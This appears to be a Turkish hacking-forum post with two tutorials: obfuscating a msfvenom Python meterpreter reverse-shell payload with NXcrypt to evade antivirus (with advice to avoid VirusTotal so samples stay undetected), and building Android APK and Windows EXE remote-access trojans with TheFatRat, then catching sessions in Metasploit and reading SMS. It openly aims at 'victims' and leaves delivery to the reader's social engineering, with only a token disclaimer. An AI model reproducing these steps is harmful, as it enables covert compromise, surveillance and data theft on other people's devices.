-->

Kali Linux NXcrypt - Python Backdoor Framework

Selamun Aleyküm ..

msfvenom -p python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port -o /root/Masaüstü/output.py

git clone https://github.com/Hadi999/NXcrypt.git
cd NXcrypt
python NXcrypt.py --help

python NXcrypt.py -f /root/Masaüstü/testingpython.py -o /root/Masaüstü/cryptpython.py 


Before: Detected by 1/38
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd 

After:
 Detected by 0/37
http://nodistribute.com/result/YFH7rCW9ecbfmE2hVwQUzAd

ENCRYPTİON FİNİSHED

Stop Using Virustotal !!!! Please, Use nodistribute.com

continuation :
msfconsole 
use exploit/multi/handler/
use payload/python/meterpreter/reverse_tcp LHOST=localhostip LPORT=open port
options
ok
exploit -j


Kali Linux Tools TheFatRAT


Selamun Aleyküm ..

TheFatRAT Nedir?

Msfvenom (Metasploit Çerçevesinin Bir Parçası) İle Arka Kapı Açmak İçin Kolay Bir Araçtır. Bu Araç, Popüler Yüklü Bir Malware (Virus) Derler Ve Sonra Derlenmiş Zararlı Yazılımları Windows, Android, Mac Üzerinde Çalıştırır. Bu Araçla Oluşturulan Zararlı Yazılımların Çoğu A.V (Anti Virüs) Yazılımlarının Korumasını Atlamak Gibi Bir Yeteneği Var.
Kısaca Tanımını Yaptıktan Sonra Aracımızı İndirip Kurulum İşlemlerini Yapalım.
Linuxda Terminali Açıp ;
cd Desktop 
git clone https://github.com/Screetsec/TheFatRat.git
Yazarak TheFatRaT 'i Desktopa Yani Masaüstüne İndirelim.

Ardından 
cd TheFatRat Yazarak İndirdiğimiz Klasörün İçine Girip
ls Komutuyla Listeleyelim Gördüüğünüz Gibi Setup Dosyası Var
cd setup Yazarak Dosyamızın İçine Girelim
chmod +x setup.sh && ./setup.sh
Yazarak Yetkilendirmemizi Yapıp Aracımızın Kurulumunu Gerçekleştirelim.

Gerekli Araçların Kurulumu İçin Bekliyoruz.

Kurulum İşlemimiz Bittikten Sonra ;
cd ..
Yazarak TheFatRAT Klasörüne Geliyorum
ls komutuyla Listeliyorum.
 powerfull.sh ve fatrat Dosyalarina Gerekli İzinleri Veriyorum.
chmod +x powerfull.sh
chmod +x fatrat

./fatrat yazarak Çalıştırıyoruz

Herhangi Bi Tuşa Basarak Devam Ediyoruz.

Enterlıyoruz.

Evet Kurulum İşlemimiz Bitti Artık Rat Oluşturabiliriz.
1. Yazıp Enterlıyoruz

Sanal Windows Kurulu Olmadığı İçin Ben Şuanda Sizlere Andorid Emulatör Üzerinde Göstereceğim Onun İçin 3. Seçenekteki Android Fatrat.APK yi Seçiyorum.


3. Yazdıktan Sonra Bize LHOST Ve LPORT 'Larımızı Soruyor Local Host Adresimizi Öğrenmek İçin Yeni Terminal Açıp ipconfig Komutunu Yazıyoruz
LHOST  Adresimizi Yazıyoruz LPORT 'umuzu Belirtiyoruz (4444)
Ardından Oluşacak APK Dosyamızın Adını Belirtiyoruz Gelen Pencereden
3. Seçeneği Yani android/meterpreter/reverse_tcp 'yi Seçip Ok Diyoruz

androidhack.apk Adında Oluşturdu APK Dosyamızı.(İp Adresleri Farkli Aldırmayın Diğer Pc De Metasploitte Hata Aldım O Yüzden Başka Pcden Yapıyorum)


Oluşan androidhack.apk TheFatRat Dosyamızın İçindeki Output Dosyasına Kayıt Ediyor Otamatik Olarak Oradan Alıp Android Emulatörümüze Yükleyelim Çalıştıralim.


Tabi Bunu Siz Kurbana Nasıl Yüklettirip Nasıl Çalıştırmasına İkna Ediceksiniz Orası Size Kalmıs :)
Yeni Tarminal Açıp msfconsole Yazarak Metasploit Framework Konsolumuzu Açıyoruz.


Açıktan Sonra;
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
Yazarak Exploitimizi Ve Payloadımızı Belirtiyoruz.

Ardından Apk Oluşturken Girdiğimiz LHOST Ve LPORT 'umuzu Yazıyoruz.
set lhost 192.168.72.133
set lport 4444
Ve exploit Yazarak Çalıştırıyoruz

Session 1 Opened = Yani 1 Oturum Açıldı Diyor

sysinfo Komutla Bilgilere Bakalım Gerçekten Oturum Açılmışmı.
Gördüğünüz Gibi Bilgileri Gösteriyor.

Şimdi help Yazarak Neler Yapabileceğimize Bakalım
help;


check_root Yazarak Root Edelim.

ifconfig Yazıp İp,Mac Bilgilerine Bakalim

Help Yazınca Zaten Neler Yapabileceğinizi Gösteriyor Atıyorum Sms Bilgilerini Almak İçin dump_sms Yazmalisiniz. Şimdi Gelelim Windows İçin Rat Oluşturmaya
İster 1 Numaradan Androidhack.apk Oluşturduğumuz Gibi Oluşturabilir Yada 2. Ve 6. Numaradan Aynı Sekılde Oluşturabilirsiniz.

  Burada Dikkat Etmeniz Gereken Husus 2. ve 6. Seçenektekii % Değerleri.
Bakınız 2. Seçenekte %100 6. Seçenekte %1000 Biz Buradan 2.Seçeneği Kullanarak Rat Oluşturacağız.
Şimdi 2 Yazıp Enterlıyoruz.
Ve Böyle Bı Ekran Karşılıyor Bizi

Yine Aynı Şekilde Bize LHOST 'umuzu Ve LPORT 'umuzu Soruyor
Yeni Terminal Açıp İfconfig Yazarak  Lhost Adresimizi Öğreniyoruz.

Gerekli Bilgileri Yazıp Enterlıyoruz.

/root/Desktop/TheFatRat/output/powerfull.exe Olarak Kayıt Ettiğini Görüyoruz.

Bakalım Gerçektende Ordamı (:

Şimdi 2 Tane Sorunumuz Var
1. Bunu Kurbanin Bilgisayarina Nasıl İndirticez ?
2. Hadi İndirttik Nasıl Çalıştırmasına İkna Edicez ?
Eee Onuda Sizlerin Sosyal Mühendisliğine Bırakıyorum (:

Bu 2 Sorunu Çözdüğünüzü Varsayarak
Yeni Terminal Açıp
msfconsole Yazarak
Metasploit Framework Konsolumuzu Açıyoruz.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Komutlarini Yazarak Exploitimizi Payloadımızı Belirliyoruz.
show options
Show Options Komutu İle Ayarlara Bakıyoruz
Ratı Oluştururken Girdiğimiz Lhost Ve Lport Adresimizi Giriyoruz.

set LHOST 192.168.72.133
set LPORT 8080

exploit
Komutuyla Çalıştıyoruz Çalıştıktan Sonra Yine Help Yazarak Gerekli Komut Bilgilerini Alabilirsiniz
Sanal Windows Kurulu Olmadığı İçin Gösteremiyorum.

NOT: KONU BİLGİLENDİRME AMAÇLIDIR OLUŞABİLECEK SORUNLARDAN ŞAHSINIZ SORUMLUDUR. 

TrazeR Sundu //